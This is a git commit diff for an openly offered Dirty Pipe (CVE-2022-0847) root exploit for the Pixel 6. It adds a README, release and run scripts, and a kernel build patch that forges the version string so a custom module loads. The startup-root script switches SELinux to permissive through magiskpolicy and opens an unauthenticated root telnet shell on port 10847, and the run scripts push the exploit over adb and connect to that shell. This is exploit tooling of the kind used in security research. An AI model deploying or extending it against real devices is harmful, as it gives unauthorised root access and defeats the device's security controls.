Add README.md and scripts.

Makefile

@@ -2,13 +2,14 @@ CC=aarch64-linux-android31-clang
 CXX=aarch64-linux-android31-clang++
 STRIP=llvm-strip
 CFLAGS=-O2
-ADB=adbm
+ADB=adb
 MYMOD_COPY=../../p6/kernel/out/android-gs-pixel-5.10/dist/mymod.ko
 D=/data/local/tmp
 LI=/system/lib/libldacBT_enc.so
 OBJS=dirtypipe-android.o stage1.o stage2-payload-include.S
+VERSION=1.0.0
 
-build: dirtypipe-android
+build: dirtypipe-android mymod.ko
 
 dirtypipe-android: dirtypipe-android.o Makefile stage1.o stage2-payload-include.S stage2-payload
 	$(CC) $(CFLAGS) -Wall -o $@ dirtypipe-android.o stage1.o stage2-payload-include.S
@@ -66,3 +67,6 @@ install: dirtypipe-android startup-root magisk/busybox
 run: install
 	$(ADB) shell $(D)/dirtypipe-android
 
+release: build
+	./release.sh $(VERSION)
+

README.md

@@ -0,0 +1,42 @@
+# DirtyPipe for Android
+Dirty Pipe (CVE-2022-0847) temporary root PoC for Android.
+
+# Targets
+Currently only run on Pixel 6 with security patch level 2022-02-05.
+Don't use on other devices or other versions. It must crash (reboot).
+
+# How to use
+1. Download binary from release page.
+2. Setup adb (android platform tools).
+3. Launch run.bat (For Windows) or run.sh (For Linux/Mac)
+  - If you get `'adb' is not recognized ...` errors, check to add adb to PATH.
+4. You now get temporary root shell by telnet <Device IP Address> 10847
+
+![Screenshot](/screenshot1.png)
+
+# How to build
+1. Install Android NDK
+2. Set PATH for aarch64-linux-android31-clang
+  - $ export PATH=$PATH:$ANDROID\_NDK/toolchains/llvm/prebuilt/linux-x86\_64/bin
+3. Run make
+  - $ make
+
+# How to build kernel module
+1. Download Pixel 6 kernel source. [Link](https://source.android.com/setup/build/building-kernels)
+2. Put mymod directory on kernel/private/google-modules/
+3. Apply mymod/build-script-patch.patch to kernel/private/gs-google
+4. Run build script
+  - # For first build
+  - $ LTO=thin ./build/build.sh
+  - # For faster rebuild (skip full rebuild)
+  - $ SKIP\_MRPROPER=1 SKIP\_DEFCONFIG=1 LTO=thin ./build/build.sh
+
+# Future work
+- Stop using insecure telnet
+- Make apk
+- Install Magisk
+- Add device support
+
+# Credits
+- https://dirtypipe.cm4all.com/
+

mymod/build-script-patch.patch

@@ -0,0 +1,109 @@
+diff --git a/build.config.slider b/build.config.slider
+index 595b8d75d11a..fb32e8fabe86 100644
+--- a/build.config.slider
++++ b/build.config.slider
+@@ -2,13 +2,16 @@
+
+ MAKE_GOALS="$MAKE_GOALS
+ modules
+-google/gs101-a0.dtb
+-google/gs101-b0.dtb
+-google/dtbo.img
+-google/gs101-dpm-eng.dtbo
+-google/gs101-dpm-user.dtbo
+-google/gs101-dpm-userdebug.dtbo
+ "
++MAKE_GOALS="modules"
++
++#google/gs101-a0.dtb
++#google/gs101-b0.dtb
++#google/dtbo.img
++#google/gs101-dpm-eng.dtbo
++#google/gs101-dpm-user.dtbo
++#google/gs101-dpm-userdebug.dtbo
++#"
+
+ FILES="
+ arch/arm64/boot/dts/google/gs101-a0.dtb
+@@ -18,12 +21,13 @@ arch/arm64/boot/dts/google/gs101-dpm-eng.dtbo
+ arch/arm64/boot/dts/google/gs101-dpm-user.dtbo
+ arch/arm64/boot/dts/google/gs101-dpm-userdebug.dtbo
+ "
++FILES=""
+
+-if [ -z "$MIXED_BUILD" ]; then
+-FILES="$FILES
+-$DEVICE_KERNEL_FILES
+-"
+-fi
++#if [ -z "$MIXED_BUILD" ]; then
++#FILES="$FILES
++#$DEVICE_KERNEL_FILES
++#"
++#fi
+
+ MODULES_LIST=${KERNEL_DIR}/vendor_boot_modules.slider
+
+@@ -58,3 +62,16 @@ private/google-modules/power/reset
+ private/google-modules/bluetooth/broadcom
+ private/google-modules/nfc
+ "
++EXT_MODULES="
++private/google-modules/mymod
++"
++
++POST_DEFCONFIG_CMDS="update_debug_config"
++function update_debug_config() {
++    ${KERNEL_DIR}/scripts/config --file ${OUT_DIR}/.config \
++         --set-str CONFIG_LOCALVERSION "-g0d8fb02914e6-ab8042715" \
++         -e CFI \
++         -e CFI_CLANG
++    (cd ${OUT_DIR} && \
++     make O=${OUT_DIR} $archsubarch CC=${CC} CROSS_COMPILE=${CROSS_COMPILE} olddefconfig)
++}
+diff --git a/scripts/setlocalversion b/scripts/setlocalversion
+index 3f8a8ee14b10..31e71a2a9640 100755
+--- a/scripts/setlocalversion
++++ b/scripts/setlocalversion
+@@ -53,6 +53,8 @@ scm_version()
+ {
+ 	local short
+ 	short=false
++	echo "g0d8fb02914e6"
++	return
+
+ 	cd "$srctree"
+ 	if test -e .scmversion; then
+@@ -77,7 +79,7 @@ scm_version()
+ 			# If only the short version is requested, don't bother
+ 			# running further git commands
+ 			if $short; then
+-				echo "+"
++				echo ""
+ 				return
+ 			fi
+ 			# If we are past a tagged commit (like
+@@ -198,11 +200,13 @@ fi
+
+ # CONFIG_LOCALVERSION and LOCALVERSION (if set)
+ res="${res}${CONFIG_LOCALVERSION}${LOCALVERSION}"
++res="-g0d8fb02914e6-ab8042715"
+
+ # scm version string if not at a tagged commit
+ if test "$CONFIG_LOCALVERSION_AUTO" = "y"; then
+ 	# full scm version string
+-	res="$res$(scm_version)"
++	#res="$res$(scm_version)"
++	res="$res"
+ else
+ 	# append a plus sign if the repository is not in a clean
+ 	# annotated or signed tagged state (as git describe only
+@@ -210,7 +214,7 @@ else
+ 	# LOCALVERSION= is not specified
+ 	if test "${LOCALVERSION+set}" != "set"; then
+ 		scm=$(scm_version --short)
+-		res="$res${scm:++}"
++		#res="$res${scm:++}"
+ 	fi
+ fi
+

release.sh

@@ -0,0 +1,18 @@
+#!/bin/sh
+set -e
+
+version=$1
+dname="dirtypipe-android-$1"
+dir="dist/$dname"
+
+mkdir dist/
+mkdir "$dir"
+
+cp dirtypipe-android startup-root run.sh run.bat "$dir"
+
+mkdir "$dir"/magisk
+cp magisk/busybox "$dir"/magisk/
+
+cd dist/
+zip -r "$dname".zip "$dname"
+

run.bat

@@ -0,0 +1,11 @@
+@echo off
+
+set dir=/data/local/tmp
+set adb=adb -d
+
+%adb% push dirtypipe-android startup-root magisk/busybox %dir%
+%adb% shell chmod 755 %dir%/dirtypipe-android %dir%/startup-root %dir%/busybox
+%adb% shell %dir%/dirtypipe-android
+%adb% shell sleep 1
+%adb% shell %dir%/busybox telnet 127.0.0.1 10847
+

run.sh

@@ -0,0 +1,12 @@
+#!/bin/sh
+set -e
+
+dir=/data/local/tmp
+adb=${adb:-"adb"}
+
+$adb push dirtypipe-android startup-root magisk/busybox ${dir}
+$adb shell chmod 755 ${dir}/dirtypipe-android ${dir}/startup-root ${dir}/busybox
+$adb shell ${dir}/dirtypipe-android
+$adb shell sleep 1
+$adb shell ${dir}/busybox telnet 127.0.0.1 10847
+

startup-root

@@ -1,6 +1,6 @@
 #!/system/bin/sh
 # Called from modprobe-payload
-# Now in permissive domain (u:r:vendor_modprobe:s0)
+# Now in root user + permissive domain (u:r:vendor_modprobe:s0)
 
 #id > /data/local/tmp/mylog1
 #cat /proc/self/status >> /data/local/tmp/mylog1
@@ -29,7 +29,7 @@ export ANDROID_I18N_ROOT=/apex/com.android.i18n
 
 #/data/local/tmp/magisk/magiskpolicy --save /data/local/tmp/policy-dump
 /data/local/tmp/magisk/magiskpolicy --magisk --live
-/data/local/tmp/busybox telnetd -l /bin/sh -p 5860 &
+/data/local/tmp/busybox telnetd -l /bin/sh -p 10847 &
 
 # Work in progress